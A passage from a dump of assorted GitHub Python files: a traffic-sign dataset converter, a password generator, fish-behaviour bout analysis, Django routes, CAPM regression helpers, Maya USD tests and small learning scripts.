img[\"file_name\"]\n img_width = img[\"width\"]\n img_height = img[\"height\"]\n img_id = img[\"id\"]\n head, tail = os.path.splitext(filename)\n ana_txt_name = head + \".txt\" # 对应的txt名字,与jpg一致\n f_txt = open(os.path.join(ana_txt_save_path, ana_txt_name), 'w')\n for ann in data['annotations']:\n if ann['image_id'] == img_id:\n box = convert((img_width, img_height), ann[\"bbox\"])\n f_txt.write(\"%s %s %s %s %s\\n\" % (id_map[ann[\"category_id\"]], box[0], box[1], box[2], box[3]))\n f_txt.close()\n # 将图片的相对路径写入train2017或val2017的路径\n list_file.write('/%s/%s.jpg\\n' % (class_json.format(), head))\n list_file.close()\n\n def divide_TrainValTest(self, source, target):\n '''\n 创建文件路径\n :param source: 源文件位置\n :param target: 目标文件位置\n '''\n for i in ['train', 'val', 'test']:\n path = target + '/' + i\n if not os.path.exists(path):\n os.makedirs(path)\n\n # 遍历目录下的文件名,复制对应的图片到指定目录\n for root, dirs, files in os.walk(source):\n for file in files:\n file_name = os.path.splitext(file)[0]\n image_path = os.path.join(file_name + '.jpg')\n # print(source)\n if 'train' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/train/' + image_path)\n elif 'val' in source:\n shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/val/' + image_path)\n elif 'test' in source:\n 
shutil.copyfile('E:/dataset/tt100k_2021/image_reparation/'\n + image_path, target + '/test/' + image_path)\n\n def xml2txt(self):\n # coding:utf-8\n\n parser = argparse.ArgumentParser()\n # xml文件的地址,根据自己的数据进行修改 xml一般存放在Annotations下\n parser.add_argument('--xml_path', default='xml', type=str, help='input xml label path')\n # 数据集的划分,地址选择自己数据下的ImageSets/Main\n parser.add_argument('--txt_path', default='dataSet', type=str, help='output txt label path')\n opt = parser.parse_args()\n\n trainval_percent = 1.0\n train_percent = 0.9\n xmlfilepath = opt.xml_path\n txtsavepath = opt.txt_path\n total_xml = os.listdir(xmlfilepath)\n if not os.path.exists(txtsavepath):\n os.makedirs(txtsavepath)\n\n num = len(total_xml)\n list_index = range(num)\n tv = int(num * trainval_percent)\n tr = int(tv * train_percent)\n trainval = random.sample(list_index, tv)\n train = random.sample(trainval, tr)\n\n file_trainval = open(txtsavepath + '/trainval.txt', 'w')\n file_test = open(txtsavepath + '/test.txt', 'w')\n file_train = open(txtsavepath + '/train.txt', 'w')\n file_val = open(txtsavepath + '/val.txt', 'w')\n\n for i in list_index:\n name = total_xml[i][:-4] + '\\n'\n if i in trainval:\n file_trainval.write(name)\n if i in train:\n file_train.write(name)\n else:\n file_val.write(name)\n else:\n file_test.write(name)\n\n file_trainval.close()\n file_train.close()\n file_val.close()\n file_test.close()\n\n\nif __name__ == '__main__':\n tt100k = TT100K2COCO()\n #tt100k.class_statistics()\n #tt100k.original_datasets2object_datasets_re()\n #tt100k.coco_json2yolo_txt('train')\n #tt100k.coco_json2yolo_txt('test')\n #tt100k.coco_json2yolo_txt('val')\n\n tt100k.divide_TrainValTest('E:/dataset/tt100k_2021/data/dataset/annotations/val', 'E:/dataset/tt100k_2021/data')\n","repo_name":"Truoji/yolov5s-jtbz-npu","sub_path":"jtbz/tt100k2yolo.py","file_name":"tt100k2yolo.py","file_ext":"py","file_size_in_byte":26182,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"}
+{"seq_id":"27089620979","text":"import string\nimport random\n\nprint('\\n Gerador de senhas \\n')\ns1 = list(string.ascii_lowercase)\ns2 = list(string.ascii_uppercase)\ns3 = list(string.digits)\ns4 = list(string.punctuation)\n\nwhile True:\n try:\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n quantidade_caracteres = int(escolha_usuario)\n print('Escolha uma opcao: ')\n print('1-Senha basica')\n print('2-Senha forte')\n print('3-Mais informacoes')\n escolha_usuario2 = int(input(''))\n if escolha_usuario2 == 3:\n print('Senha basica: Letras maiusculas, minusculas e numeros')\n print('Senha Forte: Letras maiusculas e minusculas, numeros e simbolos')\n escolha_usuario2 = int(input('Agora escolha uma opcao: '))\n elif escolha_usuario2 > 3 or escolha_usuario2 < 1:\n print('Opcao invalida')\n escolha_usuario2 = int(input('Escolha uma opcao valida: '))\n \n\n if quantidade_caracteres < 5:\n print('A senha deve ter no minimo 5 caracter')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n elif quantidade_caracteres > 52:\n print('A senha nao pode ter mais de 52 caracteres')\n escolha_usuario = int(input('Digite o tamanho da senha: '))\n else:\n break\n except ValueError:\n print('Digite apenas numeros')\n\ndef senha_basica():\n random.shuffle(s1)\n random.shuffle(s2)\n part1 = round(quantidade_caracteres * (40/100))\n part2 = round(quantidade_caracteres * (40/100))\n part3 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n \n for x in range(part2):\n resultado.append(s2[x])\n\n for x in range(part3):\n resultado.append(s3[x])\n \n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\ndef senha_forte():\n #emabralhar tudo\n random.shuffle(s1)\n random.shuffle(s2)\n random.shuffle(s3)\n random.shuffle(s4)\n\n part1 = round(quantidade_caracteres * (30/100))\n part2 = round(quantidade_caracteres * (20/100))\n\n resultado = []\n for x in range(part1):\n resultado.append(s1[x])\n resultado.append(s2[x])\n\n for x in range(part2):\n resultado.append(s3[x])\n resultado.append(s4[x])\n\n random.shuffle(resultado)\n senha = ''.join(resultado)\n print(f'Senha gerada: {senha}')\n\n\nif escolha_usuario2 == 1:\n senha_basica()\nelif escolha_usuario2 == 2:\n senha_forte()","repo_name":"CaueConte/gerador-de-senhas","sub_path":"codigo.py","file_name":"codigo.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34555640660","text":"import numpy as np\nimport pandas as pd\n\nfrom cichlidanalysis.analysis.processing import threshold_data\n\n\ndef find_bout_start_ends(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bout_start_ends_inclusive(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. Assumes no NaNs.\n Includes streches which are at the edge\n\n :param bout_array:\n :return: bout_start, bout_end\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = (np.asarray(np.where(changes == 1)) + 1)[0]\n bout_end = (np.asarray(np.where(changes == -1)) + 1)[0]\n\n # determine if array ends with a bout\n if bout_array[-1] == 1:\n # if so add in a end\n bout_end = np.concatenate((bout_end, np.array([len(bout_array)])), axis=0)\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, add first bout as it is incomplete\n bout_start = np.concatenate((np.array([0]), bout_start), axis=0)\n\n return bout_start, bout_end\n\n\ndef bout_speeds(bout_array, speed):\n \"\"\" For each bout (1 in array, not a zero, assumes no NaNs in data), find the speed of that bout\n :param bout_array:\n :param speed:\n :return: speed_active, bout_max, bout_speed\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find global speed within active bouts\n speed_active = speed[bout_array > 0.5]\n\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout, find the max speed\n bout_max = np.zeros(bout_start.shape[0])\n for bout_n in 
np.linspace(0, bout_number - 1, bout_number):\n bout_max[int(bout_n)] = np.max(speed[bout_start[int(bout_n)]:(bout_start[int(bout_n)] + bout_lengths[int(bout_n)])])\n\n return speed_active, bout_max\n\n\ndef triggered_bout_speed(bout_array, speed, pre, post):\n \"\"\" for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n :param bout_array\n :param speed\n :param pre\n :param post\n :return: trig_bout_spd\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run bout_speeds\")\n return False\n else:\n # find bout starts, ends and lengths\n bout_start, bout_end, bout_lengths = find_bout_start_ends(bout_array)\n bout_number = bout_start.shape[0]\n\n # for every bout extract the speed \"pre\" time points before to \"post\" time points after.\n trig_bout_spd = np.empty([bout_start.shape[0], np.max(bout_lengths)]) # max(bout_lengths)+15]) # fps*10])\n trig_bout_spd[:] = np.nan\n\n for bout in np.linspace(0, bout_number - 1, bout_number):\n # extract out speed data from \"pre\" time points before to \"post\" time points after.\n if ((bout_start[int(bout)] - pre) > 0) & ((bout_start[int(bout)] + post) < speed.shape[0]):\n trig_bout_spd[int(bout), 0:(pre + post)] = (speed[(bout_start[int(bout)] - pre):(bout_start[int(bout)]\n + post)]).reshape(pre + post)\n\n return trig_bout_spd\n\n\ndef find_bouts(speed, threshold):\n \"\"\" Finds active and quiescent bouts, including where they start, how long they are etc\n :param speed (smoothed)\n :param threshold: speed threshold to determine active/quiescent\n :return: active_bout_lengths, active_bout_end_t, active_bout_start_t, quiescent_bout_lengths, quiescent_bout_end_t,\n quiescent_bout_start_t, active_bout_max\n\n assume no NaNs??\n \"\"\"\n # improvements to do: deal with nans in the middle of data\n # one way to do that would be to break apart blocks at NaNs. So there would be a loop to add in uninterrupted blocks\n # need to keep track and accumulate blocks in same category (e.g. night)\n\n active_indices = threshold_data(speed, threshold)\n inactive_indices = (active_indices != 1) * 1\n\n # for active\n active_bout_start, active_bout_end, active_bout_lengths = find_bout_start_ends(active_indices)\n active_speed, active_bout_max = bout_speeds(active_indices, speed)\n\n # for inactive\n inactive_bout_start, inactive_bout_end, inactive_bout_lengths = find_bout_start_ends(inactive_indices)\n inactive_speed, inactive_bout_max = bout_speeds(inactive_indices, speed)\n\n return active_bout_lengths, active_bout_end, active_bout_start, inactive_bout_lengths, inactive_bout_end, \\\n inactive_bout_start, active_speed, active_bout_max, active_indices, inactive_speed, inactive_bout_max, \\\n inactive_indices\n\n\ndef find_bout_start_ends_pd(bout_array):\n \"\"\" Takes a np.array of zeros and ones and determines the start/stop of the one streches. 
Assumes no NaNs.\n\n :param bout_array:\n :return: bout_start_t, bout_end_t\n \"\"\"\n # test that the array has no NaNs\n if max(np.isnan(bout_array)):\n print(\"NaN in bout_array therefore cannot run find_bout_start_ends_pd\")\n return False\n else:\n # determine bout starts and finishes\n changes = np.diff(bout_array, axis=0)\n\n # added 1 to active_bout_start as otherwise it is the last timepoint that was below the threshold.\n # Also did it to ends so a peak of one timepoint would have a length of 1.\n bout_start = np.asarray(np.where(changes == 1)) + 1\n bout_end = np.asarray(np.where(changes == -1)) + 1\n\n # determine if array started with a bout\n if bout_array[0] == 1:\n # first bout is ongoing, remove first bout as it is incomplete\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, 1:]\n else:\n # take all starts (and ends)\n bout_start_t = bout_start[0, ]\n bout_end_t = bout_end[0, ]\n\n # remove incomplete bouts (e.g. those that do not end), in this case there will be one less end than start\n if bout_start_t.shape != bout_end_t.shape:\n if bout_start_t.shape > bout_end_t.shape:\n bout_start_t = bout_start_t[0:-1]\n else:\n print(\"something weird with number of bouts?\")\n return False\n\n # determine active inter-bout interval\n bout_lengths = bout_end_t - bout_start_t\n\n return bout_start_t, bout_end_t, bout_lengths\n\n\ndef find_bouts_input(fish_tracks_i, change_times_m, measure='rest'):\n \"\"\" Finds active and inactive bouts, including where they start, how long they are etc\n :param fish_tracks_i:\n :param measure: what to measure in the fish_tracks\n :return: fish_bouts: a dataframe with time stamps of start and ends of \"1\" or \"True\" bouts in the given data.\n \"\"\"\n fishes = fish_tracks_i['FishID'].unique()\n first = True\n\n for fish in fishes:\n all_bout_starts = pd.Series()\n all_bout_ends = pd.Series()\n\n # get individual fish\n fish_tracks_f = fish_tracks_i[fish_tracks_i.FishID == fish][['ts', measure]]\n\n # check if there are NaNs\n if np.max(np.isnan(fish_tracks_f.iloc[:, 1])):\n # break up NaN stretches\n non_nan_array = abs(((np.isnan(fish_tracks_f.iloc[:, 1])) * 1)-1)\n non_nan_array = non_nan_array.to_numpy()\n data_start, data_end = find_bout_start_ends_inclusive(non_nan_array)\n else:\n data_start, data_end = [0], [len(fish_tracks_f)]\n\n for strech_n in np.arange(0, len(data_start)):\n # calulate data stretches starts and ends\n data_stretch = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 1]\n data_stetch_ts = fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0]\n bout_start, bout_end, _ = find_bout_start_ends(data_stretch.to_numpy())\n # add the time stamps of found starts and ends to pd.Series\n all_bout_starts = pd.concat([all_bout_starts.reset_index(drop=True), data_stetch_ts.iloc[bout_start].\n reset_index(drop=True)])\n all_bout_ends = pd.concat([all_bout_ends.reset_index(drop=True), data_stetch_ts.iloc[bout_end].\n reset_index(drop=True)])\n\n # import matplotlib.pyplot as plt\n # plt.plot(fish_tracks_f.iloc[data_start[strech_n]:data_end[strech_n], 0], data_stretch)\n # plt.scatter(all_bout_starts, np.zeros([1, len(all_bout_starts)]), color='r')\n # plt.scatter(all_bout_ends, np.zeros([1, len(all_bout_starts)]), color='b')\n\n # find bout lengths for measure and nonmeasure\n all_bout_measure_lengths = all_bout_ends - all_bout_starts\n all_bout_nonmeasure_lengths = all_bout_starts.to_numpy()[1:] - all_bout_ends.to_numpy()[0:-1]\n\n # make fish_bouts df\n fish_bouts_i = 
pd.concat([all_bout_starts.reset_index(drop=True), all_bout_ends.reset_index(drop=True),\n all_bout_measure_lengths.reset_index(drop=True), pd.Series(all_bout_nonmeasure_lengths)],\n axis=1)\n fish_bouts_i.columns = ['bout_start', 'bout_end', measure + '_len', 'non' + measure + '_len']\n fish_bouts_i['FishID'] = fish\n\n # combine with the other fish\n if first:\n fish_bouts = fish_bouts_i\n first = False\n else:\n fish_bouts = pd.concat([fish_bouts, fish_bouts_i], axis=0)\n\n fish_bouts = fish_bouts.reset_index(drop=True)\n\n # add new column with Day or Night\n fish_bouts['time_of_day_m'] = fish_bouts.bout_start.apply(lambda row: int(str(row)[11:16][:-3]) * 60 +\n int(str(row)[11:16][-2:]))\n\n fish_bouts['daynight'] = \"d\"\n fish_bouts.loc[fish_bouts.time_of_day_m < change_times_m[0], 'daynight'] = \"n\"\n fish_bouts.loc[fish_bouts.time_of_day_m > change_times_m[3], 'daynight'] = \"n\"\n\n fish_bouts[\"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n fish_bouts.loc[fish_bouts['FishID'] == fish, \"bout_start\"].groupby(fish_bouts[\"bout_start\"].dt.hour).count().plot(kind=\"bar\")\n\n return fish_bouts\n\n\ndef names_bouts():\n data_names = ['spd_mean', 'move_mean', 'rest_mean', 'y_mean', 'spd_std', 'move_std', 'rest_std', 'y_std',\n 'move_bout_mean', 'nonmove_bout_mean', 'rest_bout_mean', 'nonrest_bout_mean', 'move_bout_std',\n 'nonmove_bout_std', 'rest_bout_std', 'nonrest_bout_std']\n time_v2_m_names = ['predawn', 'dawn', 'day', 'dusk', 'postdusk', 'night']\n\n spd_means = ['spd_mean_predawn', 'spd_mean_dawn', 'spd_mean_day', 'spd_mean_dusk', 'spd_mean_postdusk',\n 'spd_mean_night']\n rest_means = ['rest_mean_predawn', 'rest_mean_dawn', 'rest_mean_day', 'rest_mean_dusk', 'rest_mean_postdusk',\n 'rest_mean_night']\n move_means = ['move_mean_predawn', 'move_mean_dawn', 'move_mean_day', 'move_mean_dusk', 'move_mean_postdusk',\n 'move_mean_night']\n rest_b_means = ['rest_bout_mean_predawn', 'rest_bout_mean_dawn', 'rest_bout_mean_day', 'rest_bout_mean_dusk',\n 'rest_bout_mean_postdusk', 'rest_bout_mean_night']\n nonrest_b_means = ['nonrest_bout_mean_predawn', 'nonrest_bout_mean_dawn', 'nonrest_bout_mean_day',\n 'nonrest_bout_mean_dusk',\n 'nonrest_bout_mean_postdusk', 'nonrest_bout_mean_night']\n move_b_means = ['move_bout_mean_predawn', 'move_bout_mean_dawn', 'move_bout_mean_day', 'move_bout_mean_dusk',\n 'move_bout_mean_postdusk', 'move_bout_mean_night']\n nonmove_b_means = ['nonmove_bout_mean_predawn', 'nonmove_bout_mean_dawn', 'nonmove_bout_mean_day',\n 'nonmove_bout_mean_dusk',\n 'nonmove_bout_mean_postdusk', 'nonmove_bout_mean_night']\n\n # movement_bouts = ['move_bout_mean', 'nonmove_bout_mean', 'move_bout_std']\n # rest_bouts = ['rest_bout_mean', 'nonrest_bout_mean']\n\n return data_names, time_v2_m_names, spd_means, rest_means, move_means, rest_b_means, nonrest_b_means, move_b_means, nonmove_b_means\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"annnic/cichlid-analysis","sub_path":"cichlidanalysis/analysis/bouts.py","file_name":"bouts.py","file_ext":"py","file_size_in_byte":14474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71202604488","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name=\"index\"),\n path('about/', views.about, name='about'),\n path('property/', views.proPerty, name=\"property\"),\n path('property_single', views.property, name=\"propertySingle\"),\n path('agents/', views.agent, name=\"agents\"),\n path('agents_single/', views.agentSingle, name=\"agentSinge\"),\n path('blog/', views.blog, name=\"blog\"),\n path('blog_single/', views.blogSingle, name=\"blogSingle\"),\n path('contact/', views.contact, name=\"contact\"),\n]","repo_name":"koueAnicet/immobilier","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13820552981","text":"liczby = []\n\nwhile len(liczby) != 10:\n wpis = input(f'Podaj liczbe numer {len(liczby)+1}: ')\n if wpis == 'koniec':\n break\n else:\n liczby.append(float(wpis))\n\nprint(f'Srednia wartosc liczb to: {sum(liczby)/len(liczby)}')","repo_name":"konradmaleckipl/python_bootcamp_20180825","sub_path":"zjazd2/zad2.py","file_name":"zad2.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"37115490394","text":"from matplotlib.ticker import PercentFormatter\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels . api as sm\r\nimport pandas as pd\r\nimport os\r\nimport numpy as np\r\ndef plotbar(P,string):\r\n for e in P:\r\n plt.bar(e[0],e[1])\r\n plt.xticks(rotation=90)\r\n plt.savefig(\"TEST\"+string+\".png\")\r\n\r\ndef plotCAPM(Stocks,Market,OLSResult,Subset,String):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/img/testCAPM/\"\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n myint=iter(Subset.columns)\r\n for e,OLSRes in zip(Stocks,OLSResult):\r\n str=next(myint).strip()\r\n plt.figure()\r\n plt.plot(Market, OLSRes.iloc[1][0]*Market+OLSRes.iloc[0][1])\r\n plt.scatter(Market,e)\r\n plt . xlabel ('Eurostoxx')\r\n plt . ylabel (str)\r\n plt.savefig(\"img/testCAPM/CAPM-\"+str+String+\".png\")\r\n plt.close()\r\n\r\n\r\ndef plotscatter(setx,sety,title,xlabel,ylabel,sigla,Subset,string_to_save):\r\n cwd = os.getcwd()\r\n folder = cwd + \"/\"+string_to_save\r\n\r\n if not os.path.exists(folder):\r\n os.mkdir(folder)\r\n \r\n myint=iter(Subset.columns)\r\n for e in sety:\r\n str=next(myint)\r\n plt.figure()\r\n plt.scatter(setx,e)\r\n plt.title(title)\r\n plt . xlabel (xlabel)\r\n plt . ylabel (str+ylabel)\r\n plt.savefig(folder+\"/\"+sigla+\"-\"+str+\".png\")\r\n plt.close()\r\n \r\n\r\n\r\ndef OLS(Stock_Risk_Free,Market,printSummary=False):\r\n Res= []\r\n X = np . column_stack (( np . ones_like ( Market ) , Market ))\r\n try:\r\n Stock_Risk_Free.shape[1]\r\n for e,i in zip(Stock_Risk_Free,range(0,len(Stock_Risk_Free))):\r\n df = sm . OLS ( e[1:] , X[1:] ). fit ()\r\n Res.append(pd.read_html(df.summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n if printSummary:\r\n with open('summary'+str(i)+'.txt', 'w') as fh:\r\n fh.write(df.summary().as_html())\r\n except:\r\n Res.append(pd.read_html(sm . OLS ( Stock_Risk_Free[1:], X[1:] ). fit ().summary().tables[1].as_html(),header=0,index_col=0)[0])\r\n \r\n \r\n return Res\r\n\r\ndef ReorderByOLSParam(Stocks,Subset,Row_interess,Coloum_interess):\r\n \"\"\"\r\n Function return stock reorder by OLS result\r\n Row_interess -> choose row of OLS Summary between\r\n Const=0, X1=1\r\n\r\n Coloum_interess-> choose coloum of OLS summary between\r\n coef=0 std err=1 t=2 P>|t|=3 0.025=4 0.975=5 \r\n \"\"\" \r\n P = {}\r\n myint=iter(Subset.columns)\r\n for e in Stocks:\r\n P[next(myint)]=e.iloc[Row_interess][Coloum_interess]\r\n return sorted(P.items(), key=lambda x:x[1])\r\n","repo_name":"RiccardoForni/Regression_Project","sub_path":"Project - Mazzolin, Forni, Dian, Lavarello/Regre_Function.py","file_name":"Regre_Function.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"34331953708","text":"import fixturesUtils\nimport mayaUtils\nimport testUtils\nimport ufeUtils\n\nfrom maya import cmds\nfrom maya import standalone\n\nimport ufe\n\nimport os\nimport unittest\n\nclass SceneSegmentTestCase(unittest.TestCase):\n '''Verify the Scene Segment UFE interface, for multiple runtimes.\n \n UFE Feature : ProxyShape, stage nesting\n Maya Feature : ProxyShape\n Action : query scene segments\n '''\n\n pluginsLoaded = False\n \n @classmethod\n def setUpClass(cls):\n fixturesUtils.readOnlySetUpClass(__file__, loadPlugin=False)\n\n if not cls.pluginsLoaded:\n cls.pluginsLoaded = mayaUtils.isMayaUsdPluginLoaded()\n\n @classmethod\n def tearDownClass(cls):\n standalone.uninitialize()\n\n def setUp(self):\n ''' Called initially to set up the maya test environment '''\n # Load plugins\n self.assertTrue(self.pluginsLoaded)\n\n # load the file and get ready to test!\n cmds.file(force=True, new=True)\n mayaUtils.loadPlugin(\"mayaUsdPlugin\")\n testFile = testUtils.getTestScene(\"camera\", 'TranslateRotate_vs_xform.usda')\n mayaUtils.createProxyFromFile(testFile)\n globalSelection = ufe.GlobalSelection.get()\n globalSelection.clear()\n\n def testProxyShapeSceneSegmentHandler(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n camerasParentPath = ufe.PathString.path('|stage|stageShape,/cameras')\n\n # searching on a gateway item should give all gateway nodes in the child segment.\n # USD doesn't have any gateway nodes, so the result should be empty\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n # searching the the parent of a gateway item searches the Maya scene segment\n # for gateway nodes without recursing into USD. should be the proxy shape\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n # searching for the USD parent of both cameras should find no scene segment handler\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(camerasParentPath.runTimeId())\n self.assertEqual(handler, None)\n\n @unittest.skipUnless(ufeUtils.ufeFeatureSetVersion() >= 4, 'Test for UFE v4 or later')\n def testFilteredFindGatewayItems(self):\n proxyShapePath = ufe.PathString.path('|stage|stageShape')\n proxyShapeParentPath = ufe.PathString.path('|stage')\n\n # Searching on a gateway item should give all gateway nodes in\n # the child segment. USD doesn't have any gateway nodes, so the\n # result should be empty. 
When using the filtered version of\n # `findGatewayItems()`, the result should still be empty.\n # Filtering can never increase the cardinality of the result.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapePath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapePath)\n self.assertTrue(result.empty())\n\n usdRunTimeId = ufe.RunTimeMgr.instance().getId('USD')\n result = handler.findGatewayItems(proxyShapePath, usdRunTimeId)\n self.assertTrue(result.empty())\n\n otherRunTimeId = 6174\n result = handler.findGatewayItems(proxyShapePath, otherRunTimeId)\n self.assertTrue(result.empty())\n\n # Searching from the parent of a gateway item searches the Maya\n # scene segment for gateway nodes without recursing into USD.\n # If no filter is specified or if the USD runtime ID is used as\n # a filter, this should return the proxy shape. If a different\n # runtime ID is used as a filter, the result should be empty.\n handler = ufe.RunTimeMgr.instance().sceneSegmentHandler(proxyShapeParentPath.runTimeId())\n \n result = handler.findGatewayItems(proxyShapeParentPath)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertEqual(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, usdRunTimeId)\n self.assertTrue(result.contains(proxyShapePath))\n self.assertTrue(len(result), 1)\n\n result = handler.findGatewayItems(proxyShapeParentPath, otherRunTimeId)\n self.assertTrue(result.empty())\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"Autodesk/maya-usd","sub_path":"test/lib/ufe/testSceneSegment.py","file_name":"testSceneSegment.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"16"}
+{"seq_id":"39242594256","text":"prompt = (\"\\nPlease state your message\")\nprompt += \"\\n(or enter 'quit' to move on.): \"\n\n# message = \"\"\n# while message != 'quit':\n# message = input(prompt)\n\n# if message != 'quit':\n# print(message)\n\n#using a flag\nactive = True\nwhile active:\n message = input(prompt)\n\n if message == 'quit':\n active = False\n else:\n print(message)\n\n#using break to exit a loop\nprompt = (\"\\nPlease enter food you'd like to order\")\nprompt += \"\\n(or enter 'quit' to end program.): \"\n\nwhile True:\n food = input(prompt)\n\n if food == 'quit':\n break\n else: \n print (f\"We will have your {food.upper()} ready in the next 15 minutes\")","repo_name":"hanna1cho/python_crash_course","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"45102797009","text":"import rospy\nimport actionlib\n\n\ndef motion_test(self, goals, goal_type=0):\n \"\"\"goals =[left arm, right arm]\"\"\"\n service_name = \"execute_all_joint_poses\"\n group_name = 'dual_arm'\n try:\n rospy.wait_for_service(service_name, 1)\n client = rospy.ServiceProxy(service_name, ExecuteAllJointPoses)\n except rospy.ROSException:\n rospy.logwarn('Service ' + service_name + ' not available')\n return None\n req = ExecuteAllJointPosesRequest()\n req.group_name = group_name\n req.goals = ros_utils.to_posearray_msg(goals)\n req.goal_type = goal_type\n resp = client(req)\n if resp.result_status == resp.FAILED:\n rospy.logerr('execute both joint pose failed')\n return False\n return True\n\ndef main():\n\n rospy.init_node(\"nachi_test\")\n arm_grasp.run_ee_sim()\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"zhengshuai1/robotiqcustom_ws","sub_path":"scripts/utils/srv_test.py","file_name":"srv_test.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
